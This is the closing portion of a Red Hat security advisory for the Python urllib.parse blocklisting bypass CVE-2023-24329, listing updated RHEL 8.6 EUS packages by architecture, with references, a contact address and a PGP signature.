2173917 - CVE-2023-24329 python: urllib.parse url blocklisting bypass

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
PyYAML-5.4.1-1.module+el8.5.0+10613+59a13ec4.src.rpm  
mod_wsgi-4.7.1-4.module+el8.4.0+9822+20bf1249.src.rpm  
numpy-1.19.4-3.module+el8.5.0+12204+54860423.src.rpm  
python-PyMySQL-0.10.1-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-cffi-1.14.3-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-chardet-3.0.4-19.module+el8.4.0+9822+20bf1249.src.rpm  
python-cryptography-3.3.1-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-idna-2.10-3.module+el8.4.0+9822+20bf1249.src.rpm  
python-lxml-4.6.5-1.module+el8.6.0+13933+9cf0c87c.src.rpm  
python-ply-3.11-10.module+el8.4.0+9822+20bf1249.src.rpm  
python-psutil-5.8.0-4.module+el8.4.0+9822+20bf1249.src.rpm  
python-psycopg2-2.8.6-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-pycparser-2.20-3.module+el8.4.0+9822+20bf1249.src.rpm  
python-pysocks-1.7.1-4.module+el8.4.0+9822+20bf1249.src.rpm  
python-requests-2.25.0-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-toml-0.10.1-5.module+el8.4.0+9822+20bf1249.src.rpm  
python-urllib3-1.25.10-4.module+el8.5.0+11712+ea2d2be1.src.rpm  
python-wheel-0.35.1-4.module+el8.5.0+12204+54860423.src.rpm  
python39-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.src.rpm  
python3x-pip-20.2.4-7.module+el8.6.0+13003+6bb2c488.src.rpm  
python3x-setuptools-50.3.2-4.module+el8.5.0+12204+54860423.src.rpm  
python3x-six-1.15.0-3.module+el8.4.0+9822+20bf1249.src.rpm  
scipy-1.5.4-3.module+el8.4.0+9822+20bf1249.src.rpm

aarch64:  
PyYAML-debugsource-5.4.1-1.module+el8.5.0+10613+59a13ec4.aarch64.rpm  
numpy-debugsource-1.19.4-3.module+el8.5.0+12204+54860423.aarch64.rpm  
python-cffi-debugsource-1.14.3-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python-cryptography-debugsource-3.3.1-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python-lxml-debugsource-4.6.5-1.module+el8.6.0+13933+9cf0c87c.aarch64.rpm  
python-psutil-debugsource-5.8.0-4.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python-psycopg2-debugsource-2.8.6-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-cffi-1.14.3-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-cffi-debuginfo-1.14.3-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-cryptography-3.3.1-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-cryptography-debuginfo-3.3.1-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-debuginfo-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-debugsource-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-devel-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-idle-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-libs-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-lxml-4.6.5-1.module+el8.6.0+13933+9cf0c87c.aarch64.rpm  
python39-lxml-debuginfo-4.6.5-1.module+el8.6.0+13933+9cf0c87c.aarch64.rpm  
python39-mod_wsgi-4.7.1-4.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-numpy-1.19.4-3.module+el8.5.0+12204+54860423.aarch64.rpm  
python39-numpy-debuginfo-1.19.4-3.module+el8.5.0+12204+54860423.aarch64.rpm  
python39-numpy-f2py-1.19.4-3.module+el8.5.0+12204+54860423.aarch64.rpm  
python39-psutil-5.8.0-4.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-psutil-debuginfo-5.8.0-4.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-psycopg2-2.8.6-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-psycopg2-debuginfo-2.8.6-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-psycopg2-doc-2.8.6-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-psycopg2-tests-2.8.6-2.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-pyyaml-5.4.1-1.module+el8.5.0+10613+59a13ec4.aarch64.rpm  
python39-pyyaml-debuginfo-5.4.1-1.module+el8.5.0+10613+59a13ec4.aarch64.rpm  
python39-scipy-1.5.4-3.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-scipy-debuginfo-1.5.4-3.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-test-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-tkinter-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
scipy-debugsource-1.5.4-3.module+el8.4.0+9822+20bf1249.aarch64.rpm

noarch:  
python39-PyMySQL-0.10.1-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-chardet-3.0.4-19.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-idna-2.10-3.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-numpy-doc-1.19.4-3.module+el8.5.0+12204+54860423.noarch.rpm  
python39-pip-20.2.4-7.module+el8.6.0+13003+6bb2c488.noarch.rpm  
python39-pip-wheel-20.2.4-7.module+el8.6.0+13003+6bb2c488.noarch.rpm  
python39-ply-3.11-10.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-pycparser-2.20-3.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-pysocks-1.7.1-4.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-requests-2.25.0-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-rpm-macros-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.noarch.rpm  
python39-setuptools-50.3.2-4.module+el8.5.0+12204+54860423.noarch.rpm  
python39-setuptools-wheel-50.3.2-4.module+el8.5.0+12204+54860423.noarch.rpm  
python39-six-1.15.0-3.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-toml-0.10.1-5.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-urllib3-1.25.10-4.module+el8.5.0+11712+ea2d2be1.noarch.rpm  
python39-wheel-0.35.1-4.module+el8.5.0+12204+54860423.noarch.rpm  
python39-wheel-wheel-0.35.1-4.module+el8.5.0+12204+54860423.noarch.rpm

ppc64le:  
PyYAML-debugsource-5.4.1-1.module+el8.5.0+10613+59a13ec4.ppc64le.rpm  
numpy-debugsource-1.19.4-3.module+el8.5.0+12204+54860423.ppc64le.rpm  
python-cffi-debugsource-1.14.3-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python-cryptography-debugsource-3.3.1-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python-lxml-debugsource-4.6.5-1.module+el8.6.0+13933+9cf0c87c.ppc64le.rpm  
python-psutil-debugsource-5.8.0-4.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python-psycopg2-debugsource-2.8.6-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-cffi-1.14.3-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-cffi-debuginfo-1.14.3-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-cryptography-3.3.1-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-cryptography-debuginfo-3.3.1-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-debuginfo-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-debugsource-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-devel-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-idle-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-libs-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-lxml-4.6.5-1.module+el8.6.0+13933+9cf0c87c.ppc64le.rpm  
python39-lxml-debuginfo-4.6.5-1.module+el8.6.0+13933+9cf0c87c.ppc64le.rpm  
python39-mod_wsgi-4.7.1-4.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-numpy-1.19.4-3.module+el8.5.0+12204+54860423.ppc64le.rpm  
python39-numpy-debuginfo-1.19.4-3.module+el8.5.0+12204+54860423.ppc64le.rpm  
python39-numpy-f2py-1.19.4-3.module+el8.5.0+12204+54860423.ppc64le.rpm  
python39-psutil-5.8.0-4.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-psutil-debuginfo-5.8.0-4.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-psycopg2-2.8.6-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-psycopg2-debuginfo-2.8.6-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-psycopg2-doc-2.8.6-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-psycopg2-tests-2.8.6-2.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-pyyaml-5.4.1-1.module+el8.5.0+10613+59a13ec4.ppc64le.rpm  
python39-pyyaml-debuginfo-5.4.1-1.module+el8.5.0+10613+59a13ec4.ppc64le.rpm  
python39-scipy-1.5.4-3.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-scipy-debuginfo-1.5.4-3.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-test-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-tkinter-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
scipy-debugsource-1.5.4-3.module+el8.4.0+9822+20bf1249.ppc64le.rpm

s390x:  
PyYAML-debugsource-5.4.1-1.module+el8.5.0+10613+59a13ec4.s390x.rpm  
numpy-debugsource-1.19.4-3.module+el8.5.0+12204+54860423.s390x.rpm  
python-cffi-debugsource-1.14.3-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python-cryptography-debugsource-3.3.1-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python-lxml-debugsource-4.6.5-1.module+el8.6.0+13933+9cf0c87c.s390x.rpm  
python-psutil-debugsource-5.8.0-4.module+el8.4.0+9822+20bf1249.s390x.rpm  
python-psycopg2-debugsource-2.8.6-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-cffi-1.14.3-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-cffi-debuginfo-1.14.3-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-cryptography-3.3.1-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-cryptography-debuginfo-3.3.1-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-debuginfo-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-debugsource-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-devel-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-idle-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-libs-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-lxml-4.6.5-1.module+el8.6.0+13933+9cf0c87c.s390x.rpm  
python39-lxml-debuginfo-4.6.5-1.module+el8.6.0+13933+9cf0c87c.s390x.rpm  
python39-mod_wsgi-4.7.1-4.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-numpy-1.19.4-3.module+el8.5.0+12204+54860423.s390x.rpm  
python39-numpy-debuginfo-1.19.4-3.module+el8.5.0+12204+54860423.s390x.rpm  
python39-numpy-f2py-1.19.4-3.module+el8.5.0+12204+54860423.s390x.rpm  
python39-psutil-5.8.0-4.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-psutil-debuginfo-5.8.0-4.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-psycopg2-2.8.6-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-psycopg2-debuginfo-2.8.6-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-psycopg2-doc-2.8.6-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-psycopg2-tests-2.8.6-2.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-pyyaml-5.4.1-1.module+el8.5.0+10613+59a13ec4.s390x.rpm  
python39-pyyaml-debuginfo-5.4.1-1.module+el8.5.0+10613+59a13ec4.s390x.rpm  
python39-scipy-1.5.4-3.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-scipy-debuginfo-1.5.4-3.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-test-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-tkinter-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
scipy-debugsource-1.5.4-3.module+el8.4.0+9822+20bf1249.s390x.rpm

x86_64:  
PyYAML-debugsource-5.4.1-1.module+el8.5.0+10613+59a13ec4.x86_64.rpm  
numpy-debugsource-1.19.4-3.module+el8.5.0+12204+54860423.x86_64.rpm  
python-cffi-debugsource-1.14.3-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python-cryptography-debugsource-3.3.1-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python-lxml-debugsource-4.6.5-1.module+el8.6.0+13933+9cf0c87c.x86_64.rpm  
python-psutil-debugsource-5.8.0-4.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python-psycopg2-debugsource-2.8.6-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-cffi-1.14.3-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-cffi-debuginfo-1.14.3-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-cryptography-3.3.1-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-cryptography-debuginfo-3.3.1-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-debuginfo-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-debugsource-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-devel-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-idle-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-libs-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-lxml-4.6.5-1.module+el8.6.0+13933+9cf0c87c.x86_64.rpm  
python39-lxml-debuginfo-4.6.5-1.module+el8.6.0+13933+9cf0c87c.x86_64.rpm  
python39-mod_wsgi-4.7.1-4.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-numpy-1.19.4-3.module+el8.5.0+12204+54860423.x86_64.rpm  
python39-numpy-debuginfo-1.19.4-3.module+el8.5.0+12204+54860423.x86_64.rpm  
python39-numpy-f2py-1.19.4-3.module+el8.5.0+12204+54860423.x86_64.rpm  
python39-psutil-5.8.0-4.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-psutil-debuginfo-5.8.0-4.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-psycopg2-2.8.6-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-psycopg2-debuginfo-2.8.6-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-psycopg2-doc-2.8.6-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-psycopg2-tests-2.8.6-2.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-pyyaml-5.4.1-1.module+el8.5.0+10613+59a13ec4.x86_64.rpm  
python39-pyyaml-debuginfo-5.4.1-1.module+el8.5.0+10613+59a13ec4.x86_64.rpm  
python39-scipy-1.5.4-3.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-scipy-debuginfo-1.5.4-3.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-test-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-tkinter-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
scipy-debugsource-1.5.4-3.module+el8.4.0+9822+20bf1249.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

Source:  
Cython-0.29.21-5.module+el8.4.0+9822+20bf1249.src.rpm  
pybind11-2.7.1-1.module+el8.6.0+12838+640e6226.src.rpm  
pytest-6.0.2-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-attrs-20.3.0-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-iniconfig-1.1.1-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-more-itertools-8.5.0-2.module+el8.4.0+9822+20bf1249.src.rpm  
python-packaging-20.4-4.module+el8.4.0+9822+20bf1249.src.rpm  
python-pluggy-0.13.1-3.module+el8.4.0+9822+20bf1249.src.rpm  
python-py-1.10.0-1.module+el8.4.0+9822+20bf1249.src.rpm  
python-wcwidth-0.2.5-3.module+el8.4.0+9822+20bf1249.src.rpm  
python3x-pyparsing-2.4.7-5.module+el8.4.0+9822+20bf1249.src.rpm

aarch64:  
Cython-debugsource-0.29.21-5.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-Cython-0.29.21-5.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-Cython-debuginfo-0.29.21-5.module+el8.4.0+9822+20bf1249.aarch64.rpm  
python39-debug-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.aarch64.rpm  
python39-pybind11-2.7.1-1.module+el8.6.0+12838+640e6226.aarch64.rpm  
python39-pybind11-devel-2.7.1-1.module+el8.6.0+12838+640e6226.aarch64.rpm

noarch:  
python39-attrs-20.3.0-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-iniconfig-1.1.1-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-more-itertools-8.5.0-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-packaging-20.4-4.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-pluggy-0.13.1-3.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-py-1.10.0-1.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-pyparsing-2.4.7-5.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-pytest-6.0.2-2.module+el8.4.0+9822+20bf1249.noarch.rpm  
python39-wcwidth-0.2.5-3.module+el8.4.0+9822+20bf1249.noarch.rpm

ppc64le:  
Cython-debugsource-0.29.21-5.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-Cython-0.29.21-5.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-Cython-debuginfo-0.29.21-5.module+el8.4.0+9822+20bf1249.ppc64le.rpm  
python39-debug-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.ppc64le.rpm  
python39-pybind11-2.7.1-1.module+el8.6.0+12838+640e6226.ppc64le.rpm  
python39-pybind11-devel-2.7.1-1.module+el8.6.0+12838+640e6226.ppc64le.rpm

s390x:  
Cython-debugsource-0.29.21-5.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-Cython-0.29.21-5.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-Cython-debuginfo-0.29.21-5.module+el8.4.0+9822+20bf1249.s390x.rpm  
python39-debug-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.s390x.rpm  
python39-pybind11-2.7.1-1.module+el8.6.0+12838+640e6226.s390x.rpm  
python39-pybind11-devel-2.7.1-1.module+el8.6.0+12838+640e6226.s390x.rpm

x86_64:  
Cython-debugsource-0.29.21-5.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-Cython-0.29.21-5.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-Cython-debuginfo-0.29.21-5.module+el8.4.0+9822+20bf1249.x86_64.rpm  
python39-debug-3.9.7-2.module+el8.6.0+19096+84e0c2a8.1.x86_64.rpm  
python39-pybind11-2.7.1-1.module+el8.6.0+12838+640e6226.x86_64.rpm  
python39-pybind11-devel-2.7.1-1.module+el8.6.0+12838+640e6226.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJRtt9zjgjWX9erEAQhFmhAAi3llMOus7frcukGGKVgl14m71Zc9Jd4H  
Y95ludcyM1/vG65fvgWOj5OK1ar3124AmhzyKYr+ScPUfYeXKrW+yROva9sOrXbJ  
9afGjsKvzmweu1re3IUhDCmZvxCiSXship0AuZ261HXbd/Q5ifAGcChd3USWlgeX  
XrcUyucYkG5+kTT9vQjPIitfHVxWIJfAEoT3teainNk0JoUwAyDMivwhp/5YDd9f  
xGSnASzS/8+USTECxw16Jhld2edXQzySjhXZOuPRKp6ZoPDKy2YYOPgiFL6fxYGk  
6+d5gKgHqBV2Q/m87aTPzyd5t6ez9u+X2o3N2v1GeV6HWWLKkxVqR6cKH6Ez/GAg  
ZF8B67We7C40iFeNBL5NA6wiVTt6e//KYmVYlhlYb6Rtly0z8pzYsNE6OamzuB8e  
561rxZJPgZXBMbI7OWH8wmDeJ7+R6ZpDfxskp+FNz7FTU6Fujbm/0XOCTNYYUPbp  
J+wXReOAoZhsb9/W9trxwVu8Pqe67WPGq7mXNDqD44ckaCsetYKPronkbl52DJqs  
+D3nPrPdpcf+++ZPaIcA4aQYnYCpM6H9R1qsvlQDBBt6sFY0BO82ZjWN5kCZ/yqD  
bciAnMDto2nkKkyB1oNHug9z41eMXp7NucdN2leExNSJ1e7Zx5zV+Wkk9IIYvU+y  
dCj4PJ1S71s=  
=2saI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql